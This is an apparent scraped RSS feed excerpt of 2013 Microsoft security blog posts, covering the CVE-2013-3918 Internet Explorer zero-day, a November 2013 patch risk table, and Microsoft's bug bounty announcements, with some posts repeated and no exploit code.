customers know and use today.</p> <p>As we continue to advance EMET, we welcome your feedback on what you like and what additional features would help in protecting your business. If you are attending <a href="http://www.rsaconference.com/">RSA Conference</a> at San Francisco, or the <a href="https://www.blackhat.com/us-13/">Blackhat Conference</a> in Las Vegas next year, be sure to stop by the Microsoft booth, and share your feedback with us. We look forward to hearing from you. &nbsp;&nbsp;</p> <p>&nbsp;</p> <p><a href="http://www.microsoft.com/emet">The EMET Team</a></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3609984&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">mitigationEMET Technical details of the targeted attack using IE vulnerability CVE-2013-3918http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspxTue, 12 Nov 2013 18:02:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:30f068c7-fab9-4f03-b8c5-ccf96e5cc4e7swiat0<p><span style="font-size: 12px;">Over the weekend we became aware of an </span><a style="font-size: 12px;" href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">active attack</a><span style="font-size: 12px;"> relying on an unknown remote code execution vulnerability of a legacy ActiveX component used by Internet Explorer. We are releasing this blog to confirm </span><a style="font-size: 12px;" href="http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx">one more time</a><span style="font-size: 12px;"> that the code execution vulnerability will be fixed in today&rsquo;s UpdateTuesday release and to clarify some details about the second vulnerability reported.</span></p> <p>The attack was disclosed to us by our security partners and it&rsquo;s the typical targeted attack exploited through a specific &ldquo;drive-by&rdquo; legitimate website that was compromised to include an additional piece of code added by the attackers. At the moment we have analyzed samples from the active attack that are targeting only older Internet Explorer versions running on Windows XP (IE7 and 8) because of the lack of additional security mitigations on those platforms (Windows 7 is affected but not under active attack). <a href="http://www.microsoft.com/emet">EMET</a> was able to proactively mitigate this exploit.</p> <p>The exploit was created combining two distinct vulnerabilities, but with different impact and severity ratings:</p> <ol> <li><span style="font-size: 12px;">a remote code execution vulnerability (</span><a style="font-size: 12px;" href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090">CVE-2013-3918</a><span style="font-size: 12px;">) in the InformationCardSigninHelper ActiveX component used by Internet Explorer;</span></li> <li><span style="font-size: 12px;">an information disclosure vulnerability (no CVE assigned yet) used by attackers only to improve the reliability of the exploit and to create ROP payloads specifically targeted for the victim&rsquo;s machine;</span></li> </ol> <p>The <span style="text-decoration: underline;">remote code execution vulnerability</span> with higher severity rating will be fixed immediately in today&rsquo;s Patch Tuesday and we advise customers to prioritize the deployment of <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-090">MS13-090</a> for their monthly release. As usual, customers with Automatic Updates enabled will not need to take any action to receive the update and will be automatically protected.</p> <p>The <span style="text-decoration: underline;">information disclosure vulnerability</span> does not allow remote code execution and so it has a lower security rating since it will be typically used in combination with other high-severity bug (like it happened with CVE-2013-3918) to improve effectiveness of exploitation. Also, this vulnerability requires attackers to have prior knowledge of path and filenames present on targeted machines in order to be successfully exploited. This vulnerability was not used to bypass ASLR, but simply to remotely determine the exact version of a certain DLL on disk in order to build a more precise ROP payload (it&rsquo;s a local information disclosure rather than a memory address disclosure).</p> <p>We are still investigating the impact and root cause of the information disclosure vulnerability and we may follow up with additional information and mitigations as they become available.</p> <p>&nbsp;</p> <p>Elia Florio &ndash; MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3610040&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MS13-0900dayZero-Day ExploitInformationCardSigninHelperIECVE-2013-3918EMET Assessing risk for the November 2013 security updateshttp://blogs.technet.com/b/srd/archive/2013/11/12/assessing-risk-for-the-november-2013-security-updates.aspxTue, 12 Nov 2013 18:01:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8ba5aa57-568b-4bc7-9dac-8325679bc402swiat0<p>Today we released eight security bulletins addressing 19 CVE&rsquo;s. Three bulletins have a maximum severity rating of Critical while the other five have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><strong>Bulletin</strong></td> <td><strong>Most likely attack vector</strong></td> <td><strong>Max Bulletin Severity</strong></td> <td><strong>Max Exploit-ability</strong></td> <td><strong>Likely first 30 days impact</strong></td> <td><strong>Platform mitigations and key notes</strong></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-090">MS13-090</a> <p>(ActiveX killbit)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Expect to continue seeing driveby-style attacks leveraging CVE-2013-3918.</td> <td>Addresses the out-of-bounds memory access vulnerability mentioned on the FireEye blog on Friday: <a href="http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html">http://www.fireeye.com/blog/technical/2013/11/new-ie-zero-day-found-in-watering-hole-attack.html</a>. &nbsp;More information about this attack can be found on our blog at&nbsp;<a href="http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx">http://blogs.technet.com/b/srd/archive/2013/11/12/technical-details-of-the-targeted-attack-using-cve-2013-3918.aspx</a></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-088">MS13-088</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-089">MS13-089</a> <p>(Windows GDI)</p> </td> <td>Victim opens a malicious .WRI file in Wordpad</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>This update addresses a vulnerability in converting a BMP to WMF. While the Wordpad vector would be only &ldquo;Important&rdquo; severity, we believe other attack vectors may exists if third party applications are installed. Those attack vectors may not require user interaction. Therefore, out of an abundance of caution, we&rsquo;ve rated this bulletin &ldquo;Critical&rdquo;.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-091">MS13-091</a> <p>(Word)</p> </td> <td>Victim opens malicious Word document.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-092">MS13-092</a> <p>(Hyper-V)</p> </td> <td>Attacker running code inside a virtual machine can cause bugcheck of host hypervisor system; or potentially execute code in another VM running on same hypervisor system.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable denial-of-service exploit developed within next 30 days.</td> <td>Guest -&gt; Host is denial-of-service (bugcheck). Guest -&gt; Guest has potential for code execution.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-093">MS13-093</a> <p>(AFD.sys)</p> </td> <td>Attacker running code at low privilege runs malicious EXE to reveal kernel memory addresses and contents.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Information disclosure only.</td> <td>Affects only 64-bit systems. Does not affect Windows 8.1.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-094">MS13-094</a> <p>(Outlook)</p> </td> <td>Attacker sends victim S/MIME email that triggers a number of HTTP requests during S/MIME signature validation. Because requests can be sent to an arbitrary host and port, timing differences can reveal to the attacker which hosts and ports are accessible to the victim&rsquo;s computer.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Information disclosure only.</td> <td>This vulnerability can be leveraged to &ldquo;port scan&rdquo; several thousand ports per S/MIME email opened by victim. Signature verification for multiple S/MIME signers in this way will take some time and will block Outlook during the process.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-095">MS13-095</a> <p>(Digital signature parsing denial-of-service)</p> </td> <td>Attackers sends malformed X.509 certificate to web service causing temporary resource exhaustion denial-of-service condition.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution. Denial of service only.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC Engineering</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3610122&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessmentrating Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alivehttp://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspxFri, 01 Nov 2013 17:20:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:729f5d15-b280-4992-bde8-307b70bff06aBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3607648http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx#comments<p>Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does &ndash; or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi&rsquo;s Wanted Dead or Alive, and it&rsquo;s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.</p> <p>Today, Microsoft is announcing the first evolution of its bounty programs, first announced in <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">June of 2013</a>. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can &ldquo;sing along&rdquo; to earn big bounty payouts than ever before.</p> <p>Today&rsquo;s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.</p> <p>Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.&nbsp; The stronger the shield, the less likely any individual bug or arrow can get through. Learning about &ldquo;ways around the shield,&rdquo; or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug &ndash; hence, we are willing to pay $100,000 for these rare new techniques.</p> <p>Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:</p> <ol start="1"> <li> <p>Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.</p> </li> <li> <p>Offering <a href="http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx">researchers a $100,000 bounty</a>&nbsp;to teach us new mitigation bypass techniques enables us to build better defenses&nbsp;into our products faster and to provide workarounds and mitigations through tools such as <a href="http://www.microsoft.com/en-us/download/details.aspx?id=39273">EMET</a>.</p> </li> <li> <p>Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses in to our products. We will&nbsp;work whenever possible with our <a href="http://www.microsoft.com/security/msrc/collaboration/mapp.aspx">MAPP program</a> and engage our community network of defenders to help mitigate these attacks more rapidly.</p> </li> </ol> <p>In this new expansion of Microsoft&rsquo;s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. The <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">submission criteria for both programs</a> are&nbsp;similar &ndash; but the source may be different.</p> <p><strong>To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com.</strong> After you preregister and sign an agreement, then we&rsquo;ll accept an entry of technical write-up and proof of concept code for bounty consideration.<br /><br />We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we&rsquo;ll pay for them even if they are currently being used in targeted attacks if the attack technique is new &ndash; because we want them dead or alive.</p> <p>This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets.&nbsp;Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.&nbsp; By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.</p> <p>We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist and karaoke MC</p> <p>Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3607648&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alivehttp://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspxFri, 01 Nov 2013 17:20:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:729f5d15-b280-4992-bde8-307b70bff06aBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3607648http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx#comments<p>Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does &ndash; or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi&rsquo;s Wanted Dead or Alive, and it&rsquo;s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.</p> <p>Today, Microsoft is announcing the first evolution of its bounty programs, first announced in <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">June of 2013</a>. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can &ldquo;sing along&rdquo; to earn big bounty payouts than ever before.</p> <p>Today&rsquo;s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.</p> <p>Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.&nbsp; The stronger the shield, the less likely any individual bug or arrow can get through. Learning about &ldquo;ways around the shield,&rdquo; or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug &ndash; hence, we are willing to pay $100,000 for these rare new techniques.</p> <p>Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:</p> <ol start="1"> <li> <p>Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.</p> </li> <li> <p>Offering <a href="http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx">researchers a $100,000 bounty</a>&nbsp;to teach us new mitigation bypass techniques enables us to build better defenses&nbsp;into our products faster and to provide workarounds and mitigations through tools such as <a href="http://www.microsoft.com/en-us/download/details.aspx?id=39273">EMET</a>.</p> </li> <li> <p>Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses in to our products. We will&nbsp;work whenever possible with our <a href="http://www.microsoft.com/security/msrc/collaboration/mapp.aspx">MAPP program</a> and engage our community network of defenders to help mitigate these attacks more rapidly.</p> </li> </ol> <p>In this new expansion of Microsoft&rsquo;s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants would also be eligible for up to $50,000 in addition if they also submit a qualifying defense idea. The <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">submission criteria for both programs</a> are&nbsp;similar &ndash; but the source may be different.</p> <p><strong>To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com.</strong> After you preregister and sign an agreement, then we&rsquo;ll accept an entry of technical write-up and proof of concept code for bounty consideration.<br /><br />We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we&rsquo;ll pay for them even if they are currently being used in targeted attacks if the attack technique is new &ndash; because we want them dead or alive.</p> <p>This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets.&nbsp;Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.&nbsp; By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.</p> <p>We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist and karaoke MC</p> <p>Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3607648&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Congratulations to James Forshaw Recipient of Our First $100,000 Bounty for New Mitigation Bypass Techniques!http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspxTue, 08 Oct 2013 16:47:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b6872250-b7f5-4cfe-b181-57356ecbacbfBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3601174http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx#comments<p>Congratulations to James Forshaw for coming up with a new exploitation technique to get our first ever $100,000 bounty. A security vulnerability researcher with <a href="http://www.contextis.com/">Context Information Security</a>, James already came in hot with design level bugs he found during the <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">IE11 Preview Bug Bounty</a>, and we&rsquo;re thrilled to give him even more money for helping us improve our platform-wide security by leaps.</p> <p>Coincidentally, one of our brilliant engineers at Microsoft, Thomas Garnier, had also found a variant of this class of attack technique. Microsoft engineers like Thomas are constantly evaluating ways to improve security, but James&rsquo; submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty.</p> <p>While we can&rsquo;t go into the details of this new mitigation bypass technique until we address it, we are excited that we will be better able to protect customers by creating new defenses for future versions of our products because we learned about this technique and its variants.</p> <p>The reason we pay so much more for a new attack technique versus for an individual bug is that learning about new mitigation bypass techniques helps us develop defenses against entire classes of attack. This knowledge helps us make individual vulnerabilities less useful when attackers try to use them against customers. When we strengthen the platform-wide mitigations, we make it harder to exploit bugs in all software that runs on our platform, not just Microsoft applications.</p> <p>If you have a new mitigation bypass technique that can defeat our latest platform-wide mitigations, or new defense idea, and would like to participate in our bounty programs, please see the official guidelines <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">here</a>. For a technical description of an exploitation technique that would have qualified, please read the SRD blog by Matt Miller and William Peteroy <a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx">here</a>. If you have an idea that&rsquo;s in scope, please send in your whitepaper and proof of concept code to secure [at] Microsoft [dot] com.</p> <p>We&rsquo;re not done evolving our freshly minted bounty programs, which have now paid out over $128,000.&nbsp;Watch this blog for future developments as we continue to hone the biggest ongoing vendor bounty program in the industry.</p> <p>Until then, our special thanks go to James: Congratulations and well done! You not only made history by receiving a total of $109,400 from our bounty programs, you&rsquo;re also helping us make our customers safer from entire classes of attack. On behalf of over a billion people worldwide -- Thank you and way to go!!</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist, Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3601174&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Congratulations to James Forshaw Recipient of Our First $100,000 Bounty for New Mitigation Bypass Techniques!http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspxTue, 08 Oct 2013 16:47:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b6872250-b7f5-4cfe-b181-57356ecbacbfBlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3601174http://blogs.technet.com/b/bluehat/archive/2013/10/08/congratulations-to-james-forshaw-recipient-of-our-first-100-000-bounty-for-new-mitigation-bypass-techniques.aspx#comments<p>Congratulations to James Forshaw for coming up with a new exploitation technique to get our first ever $100,000 bounty. A security vulnerability researcher with <a href="http://www.contextis.com/">Context Information Security</a>, James already came in hot with design level bugs he found during the <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">IE11 Preview Bug Bounty</a>, and we&rsquo;re thrilled to give him even more money for helping us improve our platform-wide security by leaps.</p> <p>Coincidentally, one of our brilliant engineers at Microsoft, Thomas Garnier, had also found a variant of this class of attack technique. Microsoft engineers like Thomas are constantly evaluating ways to improve security, but James&rsquo; submission was of such high quality and outlined some other variants such that we wanted to award him the full $100,000 bounty.</p> <p>While we can&rsquo;t go into the details of this new mitigation bypass technique until we address it, we are excited that we will be better able to protect customers by creating new defenses for future versions of our products because we learned about this technique and its variants.</p> <p>The reason we pay so much more for a new attack technique versus for an individual bug is that learning about new mitigation bypass techniques helps us develop defenses against entire classes of attack. This knowledge helps us make individual vulnerabilities less useful when attackers try to use them against customers. When we strengthen the platform-wide mitigations, we make it harder to exploit bugs in all software that runs on our platform, not just Microsoft applications.</p> <p>If you have a new mitigation bypass technique that can defeat our latest platform-wide mitigations, or new defense idea, and would like to participate in our bounty programs, please see the official guidelines <a href="http://www.microsoft.com/security/msrc/report/bypass_bounty.aspx">here</a>. For a technical description of an exploitation technique that would have qualified, please read the SRD blog by Matt Miller and William Peteroy <a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx">here</a>. If you have an idea that&rsquo;s in scope, please send in your whitepaper and proof of concept code to secure [at] Microsoft [dot] com.</p> <p>We&rsquo;re not done evolving our freshly minted bounty programs, which have now paid out over $128,000.&nbsp;Watch this blog for future developments as we continue to hone the biggest ongoing vendor bounty program in the industry.</p> <p>Until then, our special thanks go to James: Congratulations and well done! You not only made history by receiving a total of $109,400 from our bounty programs, you&rsquo;re also helping us make our customers safer from entire classes of attack. On behalf of over a billion people worldwide -- Thank you and way to go!!</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist, Microsoft Security Response Center</p> <p><a href="http://twitter.com/k8em0">http://twitter.com/k8em0</a><br />(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3601174&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Bounty News Update: Bountiful Harvesthttp://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspxFri, 04 Oct 2013 20:21:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e49b8a72-db18-49ad-8ead-9e581f3f8f63BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3600645http://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspx#comments<p>Fall is a season traditionally associated with a harvest after planting the seeds and tending the crops.&nbsp;Today I&rsquo;m proud to announce the names of six very smart people who have helped us make our products more secure by participating in our new bounty programs.&nbsp; When we launched <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">our bounty programs in June</a> this year, we had a few strategic goals in mind:</p> <ul> <li>Increase the win-win between the hacker/security researcher community and Microsoft&rsquo;s customers, and build relationships with new researchers in the process</li> <li>Receive more vulnerability reports earlier in the release cycle of our products, ideally during the beginning of the preview (or beta) period</li> <li>Learn about new exploitation techniques that can be used to defeat our platform-wide defenses, so we can build protections against entire classes of attack</li> </ul> <p>Now that we have permission from the bounty program recipients to publish their names and bounty amounts, I&rsquo;ll list them all <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">here</a>.&nbsp;You may have seen a few congratulatory and celebratory tweets; we wanted to officially acknowledge these security researchers who have helped our customers by participating in our bounty programs.</p> <p>&nbsp;</p> <p align="center"><span style="font-size: medium;"><strong>On behalf of over a billion customers, THANK YOU!</strong> </span><br /><span style="font-size: medium;">James Forshaw </span><br /><span style="font-size: medium;">Ivan Fratric </span><br /><span style="font-size: medium;">Jose Antonio Vazquez Gonzalez </span><br /><span style="font-size: medium;">Masato Kinugawa </span><br /><span style="font-size: medium;">Fermin J. Serna </span><br /><span style="font-size: medium;">Peter Vreugdenhil</span></p> <p>&nbsp;</p> <p>I am also thrilled to highlight a few of our bounty program results:</p> <p><strong>Overall:</strong></p> <p>We&rsquo;ve worked with so many bright security researchers through the years, and are thrilled that through the bounty programs, we received reports from researchers who had never reported to us directly before. This means we have even more great minds interested in working directly with us to help make our products more secure.</p> <p><strong>IE11 Preview Bug Bounty:</strong></p> <p>During the first 30 days of the IE11 preview period we received several vulnerabilities that qualified for a bounty, in contrast to the first 30 days of the IE10 beta, when we did not receive any bulletin-class reports. The Preview period is a great time for us to receive these reports because we can address these issues earlier. Oftentimes, researchers typically do not report these findings until after code was released to manufacturing. With these submissions, we will be able to address these vulnerabilities earlier in the process providing a more secure version of Internet Explorer</p> <p>As the leaves turn colors and the temperatures cool off, I&rsquo;m happy to be sharing the bountiful harvest of our programs, started as seeds planted in early summer. It&rsquo;s been a great first three months of Microsoft&rsquo;s bounty programs, and we&rsquo;re overjoyed that our programs have been met with great participation and enthusiasm from the hacker community.</p> <p>Stay tuned for more news coming soon!</p> <p>Katie Moussouris<br />Senior Security Strategist, Microsoft Security Response Center<br /><a href="https://twitter.com/k8em0">http://twitter.com/k8em0</a> &nbsp;(that&rsquo;s a zero)</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3600645&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1">bountyprogramsZero-Day ExploitBounty Bounty News Update: Bountiful Harvesthttp://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspxFri, 04 Oct 2013 20:21:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e49b8a72-db18-49ad-8ead-9e581f3f8f63BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3600645http://blogs.technet.com/b/bluehat/archive/2013/10/04/bounty-news-update-bountiful-harvest.aspx#comments<p>Fall is a season traditionally associated with a harvest after planting the seeds and tending the crops.&nbsp;Today I&rsquo;m proud to announce the names of six very smart people who have helped us make our products more secure by participating in our new bounty programs.&nbsp; When we launched <a href="http://blogs.technet.com/b/bluehat/archive/2013/06/19/heart-of-blue-gold-announcing-new-bounty-programs.aspx">our bounty programs in June</a> this year, we had a few strategic goals in mind:</p> <ul> <li>Increase the win-win between the hacker/security researcher community and Microsoft&rsquo;s customers, and build relationships with new researchers in the process</li> <li>Receive more vulnerability reports earlier in the release cycle of our products, ideally during the beginning of the preview (or beta) period</li> <li>Learn about new exploitation techniques that can be used to defeat our platform-wide defenses, so we can build protections against entire classes of attack</li> </ul> <p>Now that we have permission from the bounty program recipients to publish their names and bounty amounts, I&rsquo;ll list them all <a href="http://www.microsoft.com/security/msrc/report/acknowledgement.aspx">here</a>.&nbsp;You may have seen a few congratulatory and celebratory tweets; we wanted to officially acknowledge these security researchers who have helped our customers by participating in our bounty programs.</p> <p>&nbsp;</p> <p align="center"><span style="font-size: medium;"><strong>On behalf of over a billion customers, THANK YOU!</strong> </span><br /><span style="font-size: medium;">James Forshaw </span><br /><span style="font-size: medium;">Ivan Fratric </span><br /><span style="font-size: medium;">Jose Antonio Vazquez Gonzalez </span><br /><span style="font-size: medium;">Masato Kinugawa </span><br /><span style="font-size: medium;">Fermin J. Serna </span><br /><span style="font-size: medium;">Peter Vreugdenhil</span></p> <p>&nbsp;</p> <p>I am also thrilled to highlight a few of our bounty program results:</p> <p><strong>Overall:</strong></p> <p>We&rsquo;ve worked with so many bright security researchers through the years, and are thrilled that through the bounty programs, we received reports from researchers who had never reported to us directly before. This means we have even more great minds interested in working directly with us to help make our products more secure.</p> <p><strong>IE11 Preview Bug Bounty:</strong></p> <p>During the first 30 days of the IE11 preview period we received several vulnerabilities that qualified for a bounty, in contrast to the first 30 days of the IE10 beta, when we did not receive any bulletin-class reports. The Preview period is a great time for us to receive these reports because we can address these issues earlier. Oftentimes, researchers typically do not report these findings until after code was released to manufacturing. With these submissions, we will be able to address these vulnerabilities earlier in the process providing a more secure version of Internet Explorer</p> <p>As the 